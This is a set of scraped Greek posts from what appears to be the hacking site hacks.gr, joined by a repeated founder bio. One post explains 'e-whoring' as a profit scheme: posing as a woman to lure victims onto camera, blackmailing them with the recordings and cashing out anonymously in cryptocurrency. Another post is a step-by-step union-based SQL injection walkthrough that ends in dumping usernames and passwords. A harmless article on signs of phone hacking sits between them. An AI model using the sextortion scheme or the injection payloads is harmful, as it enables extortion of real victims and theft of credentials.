E-whoring (μετάφραση, σημαίνει ιντερνετικη πορνεία)
Δηλαδή ενας απατεώνας προσποιείται ενα άμορφο κορίτσι προκειμένου να εξαπατήσει τους χρήστες του διαδικτύου.
Ολοι μπορεί να έχουμε κάνει κάτι τέτοιο και ας μην το ξέρουμε ότι υπάρχει ορολογία γιαυτο. πχ. σε έναν φιλο μας στο facebook,σε ένα chatroom etc…
Γιατί να το κάνει κάποιος;
Φυσικά ο σκοπός είναι το κέρδος όπου σε πολλές περιπτώσεις τα ποσά κέρδους είναι πολύ μεγάλα.
Πόσο μπορεί να είναι το κέρδος;
Το κέρδος είναι ανάλογο με το θυμα σου και με το πλαστο κορίτσι που προσποιείσαι…Οσα περισσότερα δώσεις τόσα περισσότερα θα έχεις σαν κέρδος
Πως Λειτουργεί
Ο θύτης-απατεώνας δημιουργεί το πρόσωπο/προφίλ του κοριτσιού.
Μπαίνει σε chatrooms για να γίνει /γνωστη/ και έπειτα κανει φίλους(facebook,yahoo etc…)
Αφού καταφέρει και βρει τα θυματα του και τους κερδίσει την εμπιστοσύνη μπαίνει σε chat rooms με κάμερα για να μιλήσει μαζί τους.
Βέβαια αυτος που εχει στήσει ολο αυτό το “παραμύθι” έχει προμηθευτεί με το κατάλληλο λογισμικό/φωτογραφείς/βίντεο/live_shows etc…
Πολλές φορες ο απατεώνας καλεί το θυμα να γδύνετε μπροστά στη κάμερα (αφού το ίδιο κανει και το “δικό μας” όμορφο κορίτσι) και στη συνέχεια το εκβιάζει ότι θα ανεβάσει αυτο το βίντεο στο διαδίκτυο.
Πως παίρνω τα χρήματα που εχω βγάλει απο το Ewhore
Μπορείτε με κάποιον λογαριασμό Paypal, αλλα για περισσότερη ανωνυμία με Bitcoins/Litecoins.
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.
Ένας χάκερ εξηγεί πώς να καταλάβετε αν το τηλέφωνό σας έχει παραβιαστεί
Η Laura Kankaala, μία ethical white hat χάκερ, έχει εκπαιδευτεί στον τομέα του ηθικού χάκινγκ, χρησιμοποιώντας ωστόσο κακόβουλες τεχνικές με σκοπό να προστατεύσει τον απλό πολίτη και να διασφαλίσει την ασφάλειά του.
Η Laura, που διατελεί επικεφαλής Threat Intelligence για τη φινλανδική εταιρεία κυβερνοασφάλειας F-Secure, έχει προειδοποιήσει ότι η υπερθέρμανση μιας συσκευής ή ένα τυχαίο πράσινο φως στην οθόνη μπορεί να υποδεικνύει παρακολούθηση από κάποιον.
Άλλα πιθανά σημάδια περιλαμβάνουν συγκεκριμένα emails και τηλεφωνικές κλήσεις, για τις οποίες είναι σημαντικό να διατηρούμε προσοχή.
Η Kankaala είναι η ηγέτης της φινλανδικής ομάδας χάκερ KyberVPK, που χαρακτηρίζεται ως “white hat” (σε αντίθεση με τους εγκληματίες γνωστούς ως “black hat”). Έχει εμφανιστεί σε μια τηλεοπτική σειρά, όπου πραγματοποιεί χάκινγκ επιθέσεις σε όλα, από έξυπνες συσκευές για το σπίτι έως αυτοκίνητα.
Σύμφωνα με την Kankaala, “Αν ένας ηθικός χάκερ καταφέρει να αποκτήσει πρόσβαση στο τηλέφωνό σας, θα σας ενημερώσει άμεσα και θα σας βοηθήσει να αφαιρέσετε τη μη εξουσιοδοτημένη πρόσβασή του”.
“Εάν παρατηρήσετε ένα πράσινο φωτάκι στην οθόνη του Android ή ένα πορτοκαλί φωτάκι στο iPhone, μπορεί να αποτελεί προειδοποιητικό σημάδι ότι έχετε πέσει θύμα χάκινγκ, ή ότι κάποιος έχει εγκαταστήσει μια αμφίβολη εφαρμογή στο τηλέφωνό σας”, προσθέτει.
Η Kankaala επισημαίνει ότι αυτές οι προειδοποιητικές ένδειξεις εμφανίζονται κατά τη χρήση του μικροφώνου ή της κάμερας της συσκευής, αποτελώντας ένδειξη ύπαρξης κακόβουλου λογισμικού με σκοπό την κατασκοπεία.
Οι χάκερς αποτελούν συνεχή απειλή για την ασφάλεια των ψηφιακών μας ζωών. Ένα από τα κύρια είδη κινδύνων που προκύπτουν από τους χάκερς είναι η κλοπή ταυτότητας, καθώς αποκτούν πρόσβαση σε προσωπικά μας δεδομένα. Με αυτά, μπορούν να προσομοιώσουν την ταυτότητά μας και να προβαίνουν σε απάτες ή κλοπές.
Ένας άλλος κίνδυνος προκύπτει από την πιθανή καταστροφή ή παρεμπόδιση των ψηφιακών υποδομών, με δυνητικές σοβαρές επιπτώσεις στην κοινωνία και την οικονομία.
Επιπλέον, οι χάκερς μπορούν να προκαλέσουν οικονομική ζημιά μέσω κλοπής χρημάτων ή απάτης σε ψηφιακές συναλλαγές, εισβάλλοντας σε τραπεζικούς λογαριασμούς ή ηλεκτρονικά καταστήματα.
Τέλος, οι χάκερς μπορούν να παραβιάσουν την ιδιωτικότητά μας και να παρακολουθούν τις δραστηριότητές μας στο διαδίκτυο, θέτοντας σε κίνδυνο την προσωπική ζωή και την επαγγελματική μας δραστηριότητα.
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.
Το Union Based Injection δεν είναι κάτι δύσκολο σε σχέση με Blind SQL Injection , Time-based Blind SQLi etc.
Αρχικά να πούμε με δύο λόγια τι είναι το SQL Injection.
Η επίθεση SQL Injection(SQLi) μας επιτρέπει να κάνουμε “injection” SQL Queries μέσω του URL και να πάρουμε πρόσβαση σε πληροφορίες όπως : usernames , passwords , τηλέφωνα , credit card details , ονόματα , επίθετα etc. Τώρα το Vulnerable URL μας είναι το παρακάτω :
http://192.168.1.26/cat.php?id=1
Τώρα θα έρθει κι θα πει κάποιος πως ξέρουμε ότι αυτό είναι vulnerable σε SQLi ? Μετά το cat.php?id=1 μπορούμε να προσθέσουμε τα παρακάτω :
http://192.168.1.26/cat.php?id=1' http://192.168.1.26/cat.php?id=1" http://192.168.1.26/cat.php?id=1' or '1'='1 http://192.168.1.26/cat.php?id=1' and '1'='1 Τώρα άμα πήραμε ας απάντηση κάποιο από τα παρακάτω μηνύματα σημαίνει ότι είναι vulnerable σε SQLi :
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
Oracle Error : ORA-00933: SQL command not properly ended
PostgreSQL Error : PSQLException: ERROR: unterminated quoted string at or near “‘” Position: 1 or Query failed: ERROR: syntax error at or near “‘” at character 12 in /www/site/site.php on line 560.
Κάτι ακόμα που θα χρειαστούμε είναι τα διάφορα comments για το SQLi :
Linux : —
Windows : –+
Hash : #
SQL Comment : –+-
Null Byte : ;%00
Αφού είπαμε κάποια βασικά πράγματα ας ξεκινήσουμε το πρώτο πράγματα που πρέπει να κάνουμε είναι να βρούμε τον αριθμώ των columns κάτω από το query. Θα χρησιμοποιήσουμε το order by [number] :
http://192.168.1.26/cat.php?id=1 order by 1-- | Χωρίς Error http://192.168.1.26/cat.php?id=1 order by 2-- | Χωρίς Error http://192.168.1.26/cat.php?id=1 order by 3-- | Χωρίς Error http://192.168.1.26/cat.php?id=1 order by 4-- | Χωρίς Error http://192.168.1.26/cat.php?id=1 order by 5-- | Error
Όταν τρέξαμε το order by 5– πήραμε error “Unknown column ‘5’ in ‘order clause'” οπότε ο αριθμός τον column είναι 4 επειδή πήραμε error στο 5. Τώρα θα δείξουμε μερικά functions που θα μας βοηθήσουμε να πάρουμε πληροφορίες για τον στόχο μας.
@@hostname -> θα μας δώσει το hostname. @@version -> θας μας δώσει την version του DB. database() -> θα μας δώσει την συγκεκριμένη DB. schema() -> θα μας δώσει την συγκεκριμένη DB. user() -> θα μας δώσει τον χρήστη.
Υπάρχουν κι άλλα μπορείτε να ψάξετε στο google. Πάμε τώρα να χρησιμοποιήσουμε το UNION function και να πάρουμε δοκιμάσουμε μερικά functions εφόσον ο αριθμός των columns είναι 4 :
http://192.168.1.26/cat.php?id=1 union all select 1,2,3,4-- Τώρα ας χρησιμοποιήσουμε ένα function για να δούμε άμα λειτουργεί παράδειγμα το database() οπότε τώρα :
http://192.168.1.26/cat.php?id=1 union all select 1,database(),3,4-- Και πήραμε : photoblog ας απάντηση. Τώρα ας συνεχίσουμε και να πάρουμε πληροφορίες από την βάση δεδομένων, ας πάρουμε όλα τα tables από την βάση δεδομένων :
http://192.168.1.26/cat.php?id=1 union all select 1,table_name,3,4 from information_schema.tables-- Τώρα άμα τα αποτελέσματα είναι πολλά μπορούνε να χρησιμοποιήσουμε το limit() function :
#Θα πάρουμε μόνο το πρώτο table. http://192.168.1.26/cat.php?id=1 union all select 1,table_name,3,4 from information_schema.tables limit 0,1--
#Θα πάρουμε μόνο το δεύτερο table. http://192.168.1.26/cat.php?id=1 union all select 1,table_name,3,4 from information_schema.tables limit 0,2--
#Θα πάρουμε μόνο το τρίτο table. http://192.168.1.26/cat.php?id=1 union all select 1,table_name,3,4 from information_schema.tables limit 0,3-- Τώρα θα πάρουμε τα columns names κάτω από ένα table το table μας τώρα είναι το users όπου θα περιέχει το username,password :
http://192.168.1.26/cat.php?id=1 union all select 1,column_name,3,4 from information_schema.columns where table_name='users'-- Και τέλος το καλύτερο μέρος οπού θα πάρουμε τα δεδομένα από τα columns που είναι : username , password :
http://192.168.1.26/cat.php?id=1 union all select 1,concat(login,password),3,4 from users-- Δεν ήταν κάτι το δύσκολο δεν είχαμε κανένα WAF μπροστά μας.. αυτό ήταν.
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.
